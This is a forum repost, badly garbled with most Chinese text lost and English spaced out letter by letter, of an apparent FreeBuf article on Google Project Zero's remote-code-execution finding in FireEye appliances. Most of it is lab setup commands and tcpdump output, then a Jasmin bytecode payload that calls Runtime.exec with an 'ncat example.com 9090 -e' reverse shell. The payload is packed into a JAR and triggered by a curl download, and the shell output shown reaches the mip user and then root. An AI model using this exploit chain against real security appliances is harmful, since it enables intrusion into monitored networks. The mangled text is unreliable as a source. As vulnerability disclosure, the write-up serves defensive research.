搜索

[9654] 2015-12-18_编号666:谷歌发现FireEye设备高危漏洞

文档创建者:s7ckTeam
浏览次数:36
最后更新:2025-01-18
2015-12-18_编号666:谷歌发现FireEye设备高危漏洞 6 6 6 F i r e E y e   F r e e B u f   2 0 1 5 - 1 2 - 1 8 F i r e E y e F i r e E y e S P A N ( ) F i r e E y e H T T P ,   F T P ,   S M T P ( E m a i l H T T P ) F i r e E y e E m a i l 访 F i r e E y e F i r e E y e M a i l   E x c h a n g e r F i r e E y e 便 ( N e t w o r k   T a p ) 访 便 ( N e t w o r k   T a p ) 访 [ 1 ] F i r e E y e 使
P r o j e c t   Z e r o 6 6 6 F i r e E y e F i r e E y e [ 1 ] F i r e E y e I P S [ 2 ] P r o j e c t   Z e r o 6 6 6 Q F i r e E y e A 4 2 7 . 3 3 4 F i r e E y e Q F i r e E y e A N X ,   F X ,   A X   E X Q F i r e E y e A F i r e E y e 2 便 Q F i r e E y e A F i r e E y e Q F i r e E y e A F i r e E y e F i r e E y e P r o j e c t   Z e r o F i r e E y e   N X   7 5 0 0 4 F i r e E y e ( p e t h e r 3 ) ( ) F i r e E y e L A N 访
( e t h 2 ,   e t h 3 ) L i n u x 1 9 2 . 1 6 8 . 2 . 0 / 2 4 1 9 2 . 1 6 8 . 1 . 1 / 2 4 #   F i r s t ,   m a k e   s u r e   L i n u x   w i l l   a c c e p t   l o c a l < - > h u b < - > l o c a l   t r a f f i c e c h o   1   >   / p r o c / s y s / n e t / i p v 4 / c o n f / a l l / a c c e p t _ l o c a l #   G i v e   t h e   t w o   i n t e r f a c e s   c o n n e c t e d   t o   t h e   h u b   s t a t i c   a d d r e s s e s . i p   a d d r   a d d   1 9 2 . 1 6 8 . 2 . 2   d e v   e t h 2 i p   a d d r   a d d   1 9 2 . 1 6 8 . 2 . 1   d e v   e t h 3 #   R o u t e   t r a f f i c   d e s t i n e d   f o r   e a c h   a d d r e s s   t o   t h e   * o p p o s i t e *   d e v i c e i p   r o u t e   a d d   1 9 2 . 1 6 8 . 2 . 1   d e v   e t h 2 i p   r o u t e   a d d   1 9 2 . 1 6 8 . 2 . 2   d e v   e t h 3 #   F o r c e   L i n u x   t o   f o r g e t   t h a t   t h e s e   a r e   l o c a l   i n t e r f a c e s   s o   t h e   t r a f f i c   a c t u a l l y   r e a c h e s   t h e   h u b . i p   r o u t e   d e l   1 9 2 . 1 6 8 . 2 . 2   t a b l e   l o c a l i p   r o u t e   d e l   1 9 2 . 1 6 8 . 2 . 1   t a b l e   l o c a l #   N o w   a d d   c o r r e s p o n d i n g   r u l e s   f o r   e a c h   i n t e r f a c e i p   r u l e   a d d   i i f   e t h 2   l o o k u p   1 0 0 i p   r o u t e   a d d   l o c a l   1 9 2 . 1 6 8 . 2 . 2   d e v   e t h 2   t a b l e   1 0 0 i p   r u l e   a d d   i i f   e t h 3   l o o k u p   1 0 1 i p   r o u t e   a d d   l o c a l   1 9 2 . 1 6 8 . 2 . 1   d e v   e t h 3   t a b l e   1 0 1 访 t t y S 0 F i r e E y e e t h e r 1 #   E n a b l e   t h e   m a n a g e m e n t   i n t e r f a c e   o n   m y   w o r k s t a t i o n i f c o n f i g   e t h 1   u p   1 9 2 . 1 6 8 . 1 . 1   n e t m a s k   2 5 5 . 2 5 5 . 2 5 5 . 0 #   N o w   c o n f i g u r e   t h e   m a n a g e m e n t   i n t e r f a c e   o n   t h e   F i r e E y e f i r e e y e >   n o   i n t e r f a c e   e t h e r 1   d h c p
f i r e e y e >   i n t e r f a c e   e t h e r 1   i p   a d d r e s s   1 9 2 . 1 6 8 . 1 . 2   2 5 5 . 2 5 5 . 2 5 5 . 0 访 F i r e E y e 1 9 2 . 1 6 8 . 2 . 2 / 2 4 #   S t a r t   a   p y t h o n   w e b   s e r v e r   t o   s i m u l a t e   a   w e b s i t e $   s u d o   p y t h o n   - m   S i m p l e H T T P S e r v e r   8 0   & #   C r e a t e   a   f i l e   t o   d o w n l o a d $   e c h o   h e l l o   >   t e s t . t x t #   D o w n l o a d   t h e   f i l e   a c r o s s   t h e   h u b ,   s o   t h a t   t h e   F i r e E y e   c a n   s e e   i t $   c u r l   - s   h t t p : / / 1 9 2 . 1 6 8 . 2 . 2 / t e s t . t x t h e l l o F i r e E y e 使 t c p d u m p f i r e e y e >   t c p d u m p   - i   p e t h e r 3 t c p d u m p :   v e r b o s e   o u t p u t   s u p p r e s s e d ,   u s e   - v   o r   - v v   f o r   f u l l   p r o t o c o l   d e c o d e l i s t e n i n g   o n   p e t h e r 3 ,   l i n k - t y p e   E N 1 0 M B   ( E t h e r n e t ) ,   c a p t u r e   s i z e   2 6 2 1 4 4 b y t e s 1 3 : 3 8 : 3 0 . 9 8 0 0 7 3   I P   1 9 2 . 1 6 8 . 2 . 1 . 5 8 2 7 6   >   1 9 2 . 1 6 8 . 2 . 2 . h t t p :   F l a g s   [ S ] ,   s e q   2 1 1 2 4 0 8 5 3 4 ,   w i n   2 9 2 0 0 ,   o p t i o n s   [ m s s   1 4 6 0 , s a c k O K , T S   v a l   1 1 3 3 7 4 1 0 8 9 e c r   0 , n o p , w s c a l e   7 ] ,   l e n g t h   0 1 3 : 3 8 : 3 0 . 9 8 1 0 6 5   I P   1 9 2 . 1 6 8 . 2 . 2 . h t t p   >   1 9 2 . 1 6 8 . 2 . 1 . 5 8 2 7 6 :   F l a g s   [ R . ] ,   s e q   0 ,   a c k   2 1 1 2 4 0 8 5 3 5 ,   w i n   0 ,   l e n g t h   0 2   p a c k e t s   c a p t u r e d 2   p a c k e t s   r e c e i v e d   b y   f i l t e r 0   p a c k e t s   d r o p p e d   b y   k e r n e l F i r e E y e F i r e E y e F i r e E y e ( ) ( ,   y a r a   , ) 便 b o t t m i p s i l v e r f i s h   r e s p e c t i v e l y f i r e e y e >   s h o w   p m   p r o c e s s   b o t t P r o c e s s   b o t t   ( N e t w o r k   C o n t e n t   P r o c e s s i n g   E n g i n e ) S t a t e : C u r r e n t   s t a t u s :   r u n n i n g P I D :   1 4 7 4 5 U i d :   0 G i d :   0 f i r e e y e >   s h o w   p m   p r o c e s s   m i p   P r o c e s s   m i p   ( M a l w a r e   I n p u t   P r o c e s s o r ) . . . f i r e e y e >   s h o w   p m   p r o c e s s   s i l v e r f i s h P r o c e s s   s i l v e r f i s h   ( S u b m i t   f i l e s   f o r   V M   a n a l y s i s )
. . . M I P   ( M a l w a r e   I n p u t   P r o c e s s o r ) s w f   h e l p e r f l a s m f l a s h d m g   h e l p e r p 7 z i p M a c   O S p n g   h e l p e r p n g c h e c h k j a r   h e l p e r J a v a   A r c h i v e s 使 j a r s i g n e r 使 J a v a J O D E 便 r e g e x   =   r e . c o m p i l e ( " . * c l a s s   [ a - z A - Z 0 - 9 ] +   e x t e n d s   A p p l e t " ) r e g e x S c r i p t   =   r e . c o m p i l e ( " . * j a v a x . s c r i p t . S c r i p t E n g i n e " ) r e g e x R e f l e c t i o n   =   r e . c o m p i l e ( " . * j a v a . l a n g . r e f l e c t " ) J O D E J O D E 广 使 J a v a J O D E 使 S i m p l e R u n t i m e E n v i r o n m e n t   c l a s s
F i r e E y e J O D E j d b O P T I O N _ D E C R Y P T S i m p l e V i r t u a l M a c h i n e   c l a s s $   j d b   - c l a s s p a t h   " . "   n e t . s f . j o d e . d e c o m p i l e r . M a i n   t e s t . j a r I n i t i a l i z i n g   j d b   . . . > s t o p   i n   n e t . s f . j o d e . e x p r . I n v o k e O p e r a t o r . d e o b f u s c a t e S t r i n g D e f e r r i n g   b r e a k p o i n t   n e t . s f . j o d e . e x p r . I n v o k e O p e r a t o r . d e o b f u s c a t e S t r i n g . I t   w i l l   b e   s e t   a f t e r   t h e   c l a s s   i s   l o a d e d >   r u n . . . m a i n [ 1 ]   d u m p   n e t . s f . j o d e . d e c o m p i l e r . O p t i o n s . o p t i o n s n e t . s f . j o d e . d e c o m p i l e r . O p t i o n s . o p t i o n s   =   8 3 1 J A R F i r e E y e 使 J O D E c l a s s 使 j a s m i n j a v a c J O D E c l a s s 使 j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( ) s h e l l F i r e E y e n c a t S h e l l 使 j a s m i n 使 n c a t / u s r / b i n / i d . m e t h o d   p u b l i c   s t a t i c   o b f ( L j a v a / l a n g / S t r i n g ; ) L j a v a / l a n g / S t r i n g ; . l i m i t   l o c a l s   1 . l i m i t   s t a c k   8 i n v o k e s t a t i c   j a v a / l a n g / R u n t i m e / g e t R u n t i m e ( ) L j a v a / l a n g / R u n t i m e ; l d c   " n c a t   e x a m p l e . c o m   9 0 9 0   - e   / u s r / b i n / i d "
i n v o k e v i r t u a l   j a v a / l a n g / R u n t i m e / e x e c ( L j a v a / l a n g / S t r i n g ; ) L j a v a / l a n g / P r o c e s s ; l d c   " t e s t " a r e t u r n . e n d   m e t h o d P r o j e c t   Z e r o   i s s u e   t r a c k e r F i r e E y e J A R $   j a s m i n   R e v e r s e S h e l l . j $   j a r   c v f   f i r e e y e . j a r   R e v e r s e S h e l l . c l a s s a d d e d   m a n i f e s t a d d i n g :   R e v e r s e S h e l l . c l a s s ( i n   =   4 8 9 )   ( o u t =   3 1 1 ) ( d e f l a t e d   3 6 % ) S t a r t   a   l i s t e n e r   f o r   m y   c o n n e c t b a c k   s h e l l : $   n c   - l p   9 0 9 0   & [ 1 ]   1 1 1 1 5 J A R $   c u r l   h t t p : / / 1 9 2 . 1 6 8 . 2 . 2 / f i r e e y e . j a r   & >   / d e v / n u l l S h e l l $   w a i t u i d = 8 2 1 ( m i p ) g i d = 3 1 1 1 ( m i p ) g r o u p s = 3 1 1 1 ( m i p ) , 6 0 2 ( a n t i v i r u s ) , 2 0 0 0 ( a n a l y s i s ) , 3 0 0 1 ( s t a t s ) , 3 1 3 4 ( m i p _ c h i l d ) , 3 2 0 0 ( d i p c s h m ) , 3 2 0 3 ( r e p o r t s ) , 3 2 0 4 ( c o n t e n t s ) , 3 2 1 0 ( m i p _ c l i e n t ) [ 1 ] +   D o n e   n c   - l p   9 0 9 0 F i r e E y e [ ] m i p ( ) m i p 访             r o o t             F i r e E y e f i r e e y e #   i d u i d = 0 ( a d m i n )   g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) r o o t F i r e E y e r o o t
* P r o j e c t Z e r o / F B F r e e B u f F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理